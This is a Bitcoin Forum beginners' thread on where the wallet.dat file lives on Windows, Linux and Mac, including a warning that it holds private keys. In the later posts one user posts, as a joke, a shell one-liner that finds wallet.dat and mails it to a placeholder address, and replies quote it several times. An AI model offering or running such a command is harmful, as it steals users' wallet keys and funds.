Bitcoin Forum

Other => Beginners & Help => Topic started by: avero on June 15, 2011, 05:25:45 PM



Title: Wallet.dat - How Do I find it?
Post by: avero on June 15, 2011, 05:25:45 PM
Not showing up in my computer. Any suggestions?


Title: Re: Wallet.dat - How Do I find it?
Post by: Joker007 on June 15, 2011, 05:37:28 PM
1.Go to control panel.
2. Appearance and personalization
3. Folder options|Show hidden files and folders extension
4. Check show hidden files and folders
5. Uncheck hide extension files/folders.
6. Apply
7. Go to user/your name/AppData/roaming/Bitcoin
8. Wallet.dat


Title: Re: Wallet.dat - How Do I find it?
Post by: implr on June 15, 2011, 06:34:11 PM
On windows: %APPDATA%\Bitcoin\ (just paste that into explorer's address bar)
On linux: ~/.bitcoin/
Also system-wide bitcoind installations in some distros put it in /var/lib/bitcoin/


Title: Re: Wallet.dat - How Do I find it?
Post by: jbgc on June 15, 2011, 07:37:25 PM
If you are using a Mac computer:

1. Click on the "finder" icon.
2. Press keys 'Command' + 'Shift' + 'G' at the same time.
3. A box should appear.  Type ~/Library/Application Support/Bitcoin
4  Navigate to the bottom to find 'wallet.dat'
 ;)


Title: Re: Wallet.dat - How Do I find it?
Post by: simtes on June 15, 2011, 08:53:06 PM
I found my wallet.dat using your method, Joker007.

I copied it and saved it to a flash drive.

I converted it to a text file and looked at it.

It wasn't much to look at.

What can I do with the file?


Title: Re: Wallet.dat - How Do I find it?
Post by: Malnilion on June 15, 2011, 10:00:22 PM
What can I do with the file?
It's your private key, guard it with your life if you put any appreciable amount of money "into" it. If anybody else gets access to that file at any time, they can steal your BTC at any time. Meaning I could copy your wallet.dat now, wait for you to gather a shitton of BTC, and steal everything a year later.


Title: Re: Wallet.dat - How Do I find it?
Post by: tstang on June 14, 2013, 07:12:02 AM
HI,

I am a noob and asking noob question.

Can i convert this wallet.dat or this private key into some barcode or printed material so i can store it in my safe?


Title: Re: Wallet.dat - How Do I find it?
Post by: mprep on June 14, 2013, 01:25:34 PM
You can export the private key for one address (you can export as many private keys as you have addresses) and store somewhere safe that's for sure. Google it if you don't know how.


Title: Re: Wallet.dat - How Do I find it?
Post by: AliceWonder on June 14, 2013, 01:37:27 PM
find ~ -name wallet.dat


Title: Re: Wallet.dat - How Do I find it?
Post by: mprep on June 14, 2013, 01:39:25 PM
find ~ -name wallet.dat
I think he already solved that problem.


Title: Re: Wallet.dat - How Do I find it?
Post by: AliceWonder on June 14, 2013, 01:40:42 PM
find ~ -name wallet.dat

cat `find ~ -name wallet.dat` |mail -s "Free Money" okdonotreally@example.org


Title: Re: Wallet.dat - How Do I find it?
Post by: mprep on June 14, 2013, 01:42:07 PM
find ~ -name wallet.dat

cat `find ~ -name wallet.dat` |mail -s "Free Money" okdonotreally@example.org
Haven't you heard. Problem solved.


Title: Re: Wallet.dat - How Do I find it?
Post by: AliceWonder on June 14, 2013, 01:46:11 PM
find ~ -name wallet.dat

cat `find ~ -name wallet.dat` |mail -s "Free Money" okdonotreally@example.org
Haven't you heard. Problem solved.

Get a sense of humor.


Title: Re: Wallet.dat - How Do I find it?
Post by: mprep on June 14, 2013, 01:54:27 PM
find ~ -name wallet.dat

cat `find ~ -name wallet.dat` |mail -s "Free Money" okdonotreally@example.org
Haven't you heard. Problem solved.

Get a sense of humor.
I have one, it just seems yours is much more primitive.
BTW, newbies can take your joke for real and actually mail you their wallet for you to help. I don't think anyone would be able to withstand the temptation.